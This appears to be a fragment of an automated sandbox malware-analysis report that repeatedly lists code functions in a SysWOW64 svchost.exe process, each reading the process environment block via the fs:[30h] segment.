Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F307AF mov eax, dword ptr fs:[00000030h]	2_2_02F307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD678E mov eax, dword ptr fs:[00000030h]	2_2_02FD678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38770 mov eax, dword ptr fs:[00000030h]	2_2_02F38770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40770 mov eax, dword ptr fs:[00000030h]	2_2_02F40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30750 mov eax, dword ptr fs:[00000030h]	2_2_02F30750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE75D mov eax, dword ptr fs:[00000030h]	2_2_02FBE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]	2_2_02F72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F72750 mov eax, dword ptr fs:[00000030h]	2_2_02F72750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB4755 mov eax, dword ptr fs:[00000030h]	2_2_02FB4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6674D mov esi, dword ptr fs:[00000030h]	2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]	2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6674D mov eax, dword ptr fs:[00000030h]	2_2_02F6674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]	2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6273C mov ecx, dword ptr fs:[00000030h]	2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6273C mov eax, dword ptr fs:[00000030h]	2_2_02F6273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAC730 mov eax, dword ptr fs:[00000030h]	2_2_02FAC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]	2_2_02F6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C720 mov eax, dword ptr fs:[00000030h]	2_2_02F6C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30710 mov eax, dword ptr fs:[00000030h]	2_2_02F30710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60710 mov eax, dword ptr fs:[00000030h]	2_2_02F60710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C700 mov eax, dword ptr fs:[00000030h]	2_2_02F6C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004500 mov eax, dword ptr fs:[00000030h]	2_2_03004500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F304E5 mov ecx, dword ptr fs:[00000030h]	2_2_02F304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F644B0 mov ecx, dword ptr fs:[00000030h]	2_2_02F644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBA4B0 mov eax, dword ptr fs:[00000030h]	2_2_02FBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F364AB mov eax, dword ptr fs:[00000030h]	2_2_02F364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]	2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]	2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5A470 mov eax, dword ptr fs:[00000030h]	2_2_02F5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC460 mov ecx, dword ptr fs:[00000030h]	2_2_02FBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2645D mov eax, dword ptr fs:[00000030h]	2_2_02F2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5245A mov eax, dword ptr fs:[00000030h]	2_2_02F5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E443 mov eax, dword ptr fs:[00000030h]	2_2_02F6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A430 mov eax, dword ptr fs:[00000030h]	2_2_02F6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]	2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]	2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2E420 mov eax, dword ptr fs:[00000030h]	2_2_02F2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2C427 mov eax, dword ptr fs:[00000030h]	2_2_02F2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB6420 mov eax, dword ptr fs:[00000030h]	2_2_02FB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]	2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]	2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68402 mov eax, dword ptr fs:[00000030h]	2_2_02F68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E5E7 mov eax, dword ptr fs:[00000030h]	2_2_02F5E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F325E0 mov eax, dword ptr fs:[00000030h]	2_2_02F325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]	2_2_02F6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C5ED mov eax, dword ptr fs:[00000030h]	2_2_02F6C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F365D0 mov eax, dword ptr fs:[00000030h]	2_2_02F365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_02F6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A5D0 mov eax, dword ptr fs:[00000030h]	2_2_02F6A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]	2_2_02F6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E5CF mov eax, dword ptr fs:[00000030h]	2_2_02F6E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]	2_2_02F545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F545B1 mov eax, dword ptr fs:[00000030h]	2_2_02F545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]	2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]	2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FB05A7 mov eax, dword ptr fs:[00000030h]	2_2_02FB05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6E59C mov eax, dword ptr fs:[00000030h]	2_2_02F6E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32582 mov eax, dword ptr fs:[00000030h]	2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F32582 mov ecx, dword ptr fs:[00000030h]	2_2_02F32582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64588 mov eax, dword ptr fs:[00000030h]	2_2_02F64588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]	2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]	2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6656A mov eax, dword ptr fs:[00000030h]	2_2_02F6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]	2_2_02F38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38550 mov eax, dword ptr fs:[00000030h]	2_2_02F38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40535 mov eax, dword ptr fs:[00000030h]	2_2_02F40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E53E mov eax, dword ptr fs:[00000030h]	2_2_02F5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6500 mov eax, dword ptr fs:[00000030h]	2_2_02FC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]	2_2_02F6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6AAEE mov eax, dword ptr fs:[00000030h]	2_2_02F6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30AD0 mov eax, dword ptr fs:[00000030h]	2_2_02F30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]	2_2_02F64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F64AD0 mov eax, dword ptr fs:[00000030h]	2_2_02F64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]	2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]	2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86ACC mov eax, dword ptr fs:[00000030h]	2_2_02F86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]	2_2_02F38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38AA0 mov eax, dword ptr fs:[00000030h]	2_2_02F38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F86AA4 mov eax, dword ptr fs:[00000030h]	2_2_02F86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F68A90 mov edx, dword ptr fs:[00000030h]	2_2_02F68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F3EA80 mov eax, dword ptr fs:[00000030h]	2_2_02F3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]	2_2_02FACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]	2_2_02FACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]	2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]	2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]	2_2_02F6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]	2_2_02F36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]	2_2_02F40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]	2_2_02F40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]	2_2_02F54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]	2_2_02F54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]	2_2_02F6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]	2_2_02F6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]	2_2_02F5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]	2_2_02FBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]	2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]	2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]	2_2_02F38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]	2_2_02F5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]	2_2_02FBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]	2_2_02FDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]	2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]	2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]	2_2_02F50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]	2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]	2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]	2_2_02F30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]	2_2_02F40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]	2_2_02F40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]	2_2_03004A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]	2_2_02F2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]	2_2_02FC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]	2_2_02FC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]	2_2_02FFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]	2_2_02FD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]	2_2_02F5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]	2_2_02F5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]	2_2_02FF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]	2_2_02FF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]	2_2_02FAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_02F6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_02F6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_02FFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_02F5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]	2_2_02FBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]	2_2_02F30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]	2_2_02FBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]	2_2_02FBE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]	2_2_02FC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]	2_2_02FC6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]	2_2_02F60854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]	2_2_02F34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]	2_2_02F34859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]	2_2_02F42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]	2_2_02F52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]	2_2_02F6A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]	2_2_02FD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]	2_2_02FD483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]	2_2_02FBC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]	2_2_02F629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]	2_2_02F629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]	2_2_02FBE9E0
